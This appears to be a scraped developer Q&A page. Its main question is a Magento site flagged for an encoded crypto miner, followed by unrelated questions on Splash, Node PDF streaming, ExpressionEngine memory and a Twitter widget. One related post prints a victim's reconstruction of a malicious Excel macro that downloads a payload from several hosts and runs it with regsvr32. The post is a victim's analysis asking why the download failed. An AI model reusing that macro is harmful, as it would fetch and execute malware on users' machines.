When I scan my Magento website it detects "encoded JavaScript code commonly used to hide suspicious behaviour" - security

When I scan my Magento website (using the tool https://scanner.pcrisk.com/), it detects encoded JavaScript code commonly used to hide suspicious behaviour. The report shows:
Severity: Suspicious
Reason: Detected malicious crypto miner
Details: Detected encoded JavaScript code commonly used to hide suspicious behaviour.
Offset: 8
Threat dump: View code
File size[byte]: 347199
File type: HTML
MD5: 3830153B59E769056519C688A49C733E
Scan duration[sec]: 4.652
I didn't find anything suspicious in the code myself.
Is there a way around it?
I'd like to get rid of the "suspicious" flag.
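One way to track it down: a quick pattern search over the saved page source can point to the encoded block the scanner is flagging. Below is a minimal Python sketch; the file name is hypothetical and the patterns are only common obfuscation markers, so a hit is a lead to review, not proof of malware.
import re

# Hypothetical: the flagged page saved locally via "view source" or curl.
with open("homepage.html", encoding="utf-8", errors="replace") as f:
    html = f.read()

# Common markers of encoded/obfuscated JavaScript.
patterns = {
    "eval(": r"eval\s*\(",
    "atob(": r"atob\s*\(",
    "unescape(": r"unescape\s*\(",
    "String.fromCharCode": r"String\.fromCharCode",
    "long base64-looking blob": r"[A-Za-z0-9+/]{120,}={0,2}",
}

for name, pattern in patterns.items():
    for match in re.finditer(pattern, html):
        # Character offset, roughly comparable with the scanner's "Offset" field.
        print(name, "at offset", match.start())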

Related

urlmon / URLDownloadToFil - Skipped downloads

To cut a long story short, I got duped: I opened a malicious Excel file and ran the macro.
The payload was highly obfuscated, but after digging through the guts of the Excel file I managed to piece it together:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
Note: actual full URLs above redacted to avoid accidental exposure by anyone reading this.
When accessed, the malicious URLs contain the following contents:
onlinebrandedcontent: Standard Apache file index page with no contents
onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or JavaScript.
marcoantonioguerrerafitness / acceptanceh / gloselweb: Triggers download of a (presumably malicious) DLL file
It appears the code above only got as far as the onlyfansgo URL (enu.ocx on my machine contains the harmless HTML "Account Suspended" markup with a reference to webmaster#onlyfansgo.com), so it looks like I dodged a bullet (regsvr32.exe would have attempted to register an HTML file and failed).
My question: why did the payload pull the onlyfansgo URL response but stop there? If it was willing to accept an HTML file as a successful download, why did it not stop at onlinebrandedcontent? Is it something to do with the fact that onlyfansgo is the only HTTPS URL in the list?

Splash issues (d-bus, QSslSocket, libpng)

I'm trying to use Splash via the scrapinghub/splash Docker image, and I get some alerts after the first request (which goes to the /robots.txt endpoint, because I'm using the scrapy-splash plugin for the Scrapy library with Python 3.6):
[-] "172.17.0.1" - - [18/Jan/2018:00:05:12 +0000] "GET /robots.txt HTTP/1.1" 404 153 "-" "Scrapy/1.5.0 (+https://scrapy.org)"
libpng warning: iCCP: known incorrect sRGB profile
libpng warning: iCCP: known incorrect sRGB profile
process 1: D-Bus library appears to be incorrectly set up; failed to read machine uuid: UUID file '/etc/machine-id' should contain a hex string of length 32, not length 0, with no other text
See the manual page for dbus-uuidgen to correct this issue.
qt.network.ssl: QSslSocket: cannot resolve SSLv2_client_method
qt.network.ssl: QSslSocket: cannot resolve SSLv2_server_method
And the saddest thing is that it doesn't render this page. I should also mention that sometimes it does render the page, and the page contains a redirect that fires when JS is available.
How can I make it work?
UPDATE
When using scrapinghub/splash:3.0 these messages still appear, but rendering works.
So should I report this as a bug in the scrapinghub/splash image, or could these errors be caused by my environment?
UPDATE
For some reason, even 3.0 no longer renders, and neither does master (the Docker image tag). So for every image tagged latest, master, or 3.0, asking (via the form on the index endpoint) to render the http://floodlist.com/news page only shows a page with the title "You are being redirected...".
I found this issue, so the D-Bus problem may be harmless.
process 1: D-Bus library appears to be incorrectly set up; failed to read machine uuid: UUID file '/etc/machine-id' should contain a hex string of length 32, not length 0, with no other text
See the manual page for dbus-uuidgen to correct this issue.
These would appear to be fairly concise instructions on how to fix the D-Bus issue.
I don’t know about the other warnings, or whether any of them are relevant.
These warnings/errors seem to be harmless (see #491 on Splash and #122 on scrapy-splash).
And the problem with rendering was solved by increasing the wait value to 1 second. More info about rendering issues here.
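For reference, this is roughly how the wait value is passed through scrapy-splash; a minimal sketch assuming the usual scrapy-splash settings (SPLASH_URL, middlewares) are already configured as in the question, with the spider name and callback as placeholders:
import scrapy
from scrapy_splash import SplashRequest

class FloodlistSpider(scrapy.Spider):
    name = "floodlist"

    def start_requests(self):
        # wait=1 gives the JS redirect on the page time to fire before rendering.
        yield SplashRequest(
            "http://floodlist.com/news",
            callback=self.parse,
            args={"wait": 1},
        )

    def parse(self, response):
        self.logger.info(response.url)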

Streaming a PDF file from a Node server randomly just shows binary data in the browser

I have a Node app (specifically a Sails app) that serves a PDF file. My code for serving the file looks like this:
request.get(pdfUrl).pipe(res)
When I view the URL for the PDF, it usually renders fine. But sometimes it just renders the raw binary data of the PDF in the browser, like this:
%PDF-1.4 1 0 obj << /Title (��) /Creator (��wkhtmltopdf
I can't figure out why it fails to serve the PDF correctly just randomly. Is it a Chrome thing, or am I missing something?
Leaving this here in the hope that it helps somebody - I have had similar issues multiple times and it's either of two things:
You're using an HTTP connection for an HTTPS delivery (this is typical with websockets, where you must specify :443 in addition to the wss scheme).
request's encoding parameter is returning plain text instead of a binary Buffer. Fix this by setting encoding to null, as follows: request({url: myUrl, encoding: null}).
Content types in headers - I'm steering clear of this since it's obvious and others have covered it substantially enough already :)
I am pretty sure you're facing this due to (2). Have a look at https://github.com/request/request
encoding - Encoding to be used on setEncoding of response data. If null, the body is returned as a Buffer. Anything else (including the default value of undefined) will be passed as the encoding parameter to toString() (meaning this is effectively utf8 by default). (Note: if you expect binary data, you should set encoding: null.)
Since the aforementioned suggestions didn't work for you, I would like to see forensics on the following:
Are the files that fail over a particular size? Is this a buffer issue at some level?
Does the presence of a certain character in the file cause this because it breaks some of your script?
Are the metadata sections and file endings the same across a failed and a successful file? How any media file is signed up top, and how it's truncated at the bottom, can greatly affect how it is interpreted.
You may need to include the Content-Type header application/pdf in the Node response to tell the recipient that what they're receiving is a PDF. Some browsers are smart enough to determine the content type from the data stream, but you can't assume that's always the case.
When Chrome downloads the PDF as text, I would check the very end of the file. A PDF file contains the obligatory xref table at the end, so every valid PDF file should end with the sequence %%EOF. If it doesn't, the request was interrupted or something else went wrong.
You also need the HTTP headers:
Content-Disposition: inline; filename=sample.pdf
and
Content-Length: 200
Did you try saving whatever binary output you get to disk and opening it manually in a PDF reader? It could be corrupted.
I would suggest trying both of these:
Content-Type: application/pdf
Content-Disposition: attachment; filename="somefilename.pdf"
(or controlling the MIME type in other ways: https://www.npmjs.com/package/mime-types)
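Putting the header and encoding suggestions above together, here is a minimal sketch of what the serving action could look like (Sails/Express-style; pdfUrl and the error handling are placeholders, not a verified drop-in fix):
var request = require('request');

module.exports = {
  download: function (req, res) {
    // However your app resolves it - placeholder value here.
    var pdfUrl = 'https://example.com/sample.pdf';

    // Tell the browser explicitly that a PDF is coming.
    res.set('Content-Type', 'application/pdf');
    res.set('Content-Disposition', 'inline; filename="sample.pdf"');

    request
      .get({ url: pdfUrl, encoding: null }) // encoding: null keeps the body as raw bytes
      .on('error', function (err) {
        return res.serverError(err); // Sails-style error response; adjust as needed
      })
      .pipe(res);
  }
};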

High Memory Usage in ExpressionEngine Templates

I'm having an issue with what I consider high memory usage on an ExpressionEngine v2.5.3 install. This is a recent EE1-to-EE2 upgrade, if that makes a difference.
An empty template on this project uses 10MB of memory. I tested on another v2.5.3 project and an empty page there uses 2MB of memory. I'm seeing 30+MB usage on normal templates, and frequently the browser loses its connection to the server.
Is an add-on causing this increased memory usage? What's the best way to trace this back?
The install is definitely acting up after this upgrade.
TEMPLATE DEBUGGING
(0.000011 / 9.01MB) - Begin Template Processing -
(0.000172 / 9.01MB) URI: test
(0.000185 / 9.01MB) Path.php Template: /
(0.000199 / 9.01MB) Retrieving Template
(0.000210 / 9.01MB) Parsing Template URI
(0.002112 / 9.02MB) Template Group Found: test
(0.002166 / 9.02MB) Retrieving Template from Database: test/index
(0.003599 / 9.02MB) Template Found
(0.003690 / 9.02MB) Template Type: webpage
(0.003711 / 9.02MB) Parsing Site Variables
(0.003767 / 9.02MB) Snippets (Keys): structure:is:page|structure:is:listing|structure:is:listing:parent|structure:page:entry_id|structure:page:template_id|structure:page:title|structure:page:slug|structure:page:uri|structure:page:url|structure:page:channel|structure:page:channel_short_name|structure:parent:entry_id|structure:parent:title|structure:parent:slug|structure:parent:uri|structure:parent:url|structure:parent:child_ids|structure:parent:channel|structure:parent:channel_short_name|structure:top:entry_id|structure:top:title|structure:top:slug|structure:top:uri|structure:top:url|structure:child_listing:channel_id|structure:child_listing:short_name|structure:freebie:entry_id|structure:child_ids|structure:sibling_ids|structure_1|structure_2|structure_3|structure_4|structure_5|structure_6|structure_7|structure_8|structure_9|structure_10|structure_last_segment|site_id|site_label|site_short_name|last_segment
(0.003784 / 9.02MB) Snippets (Values): FALSE||||||||||||||||||||||test|/test/|/test/||||||test||||||||||test|1|Ranch|default_site|test
(0.003926 / 9.02MB) Parse Date Format String Constants
(0.003943 / 9.02MB) Parse Current Time Variables
(0.003968 / 9.02MB) Parsing Segment, Embed, and Global Vars Conditionals
(0.007698 / 9.11MB) - Beginning Tag Processing -
(0.007719 / 9.11MB) - End Tag Processing -
(0.008645 / 9.12MB) Calling Extension Class/Method: Structure_ext/template_post_parse
(0.008789 / 9.11MB) - End Template Processing -
(0.008803 / 9.11MB) Parse Global Variables
(0.009574 / 9.11MB) Template Parsing Finished
Memory Usage: 10,163,144 bytes
Different versions of PHP, different ways of running PHP (mod_php vs. FastCGI, for instance), and different functions enabled in PHP itself can lead to different levels of memory usage.
To test memory usage for plain PHP being executed, rather than EE's template engine, try the code below.
<?php
// Report the current PHP memory usage in a human-readable unit.
function echo_memory_usage() {
    $mem_usage = memory_get_usage(true);
    if ($mem_usage < 1024) {
        echo $mem_usage . " bytes";
    } elseif ($mem_usage < 1048576) {
        echo round($mem_usage / 1024, 2) . " kilobytes";
    } else {
        echo round($mem_usage / 1048576, 2) . " megabytes";
    }
    echo "<br/>";
}

// Call it to print the baseline usage outside of EE.
echo_memory_usage();
?>
You can pinpoint bottlenecks quite quickly with the Graphite add-on:
https://github.com/joelbradbury/Graphite.ee_addon
I find Graphite itself can really slow down your pages, but if you can get it to load OK, it's awesome.
Starting with an empty template, with Template Debugging turned on, is a good start and eliminates any chance of tags causing the high memory use.
Is there anything different, settings- or add-on-wise, between your 2MB-usage install and your current 10MB-usage install? With template tags eliminated as a cause, you might want to look into add-ons that could be adding overhead, in particular extensions. Feel free to post the add-ons you have installed here.
Also, disabling tracking and saving templates as files might save you some memory (see the sketch below).
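If it helps, these are the kinds of config.php overrides I would try for the tracking and template-file suggestions; the item names are from memory for EE2, so treat them as assumptions and verify against the ExpressionEngine docs before relying on them:
<?php
// system/expressionengine/config/config.php (EE2) - verify these names against the docs.
$config['disable_all_tracking'] = 'y';  // skip hit/online-user/entry-view tracking
$config['save_tmpl_files']      = 'y';  // serve templates from flat files
$config['tmpl_file_basepath']   = $_SERVER['DOCUMENT_ROOT'] . '/templates/';  // example path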
It seems the answer to my question is that ~9MB is a normal starting level for a blank template on an EE install.
The install that starts at 2MB is on an EngineHosting VPS/VSC account with APC bytecode caching enabled, hence the difference in numbers.

Twitter Widget behind proxy

I'm trying to use the Twitter widget on a site whose server is inside my corporation and hence behind its proxy.
I can't use the code they provide directly, since I can't reach the source address:
<script charset="utf-8" src="http://widgets.twimg.com/j/2/widget.js"></script>
I was wondering if I could make a local copy of the JS to avoid this problem, but when I did so I got:
ActionView::WrongEncodingError in Home#index
Your template was not saved as valid UTF-8. Please either specify UTF-8 as the encoding for your template in your text editor, or mark the template with its encoding by inserting the following as the first line of the template:
# encoding: <name of correct encoding>.
But the encoding is already set.
I'm really, really new to this stuff.
Please help.
The error you get is because Ruby needs an explicit encoding to correctly parse a non-Latin-1 file.
In each Ruby file that contains UTF-8 characters, you need a first line like this:
# encoding: UTF-8
As for the main problem in your question, you can try, but communication with Twitter is probably blocked.
You should talk to your system administrator about getting access to Twitter for your app.

Resources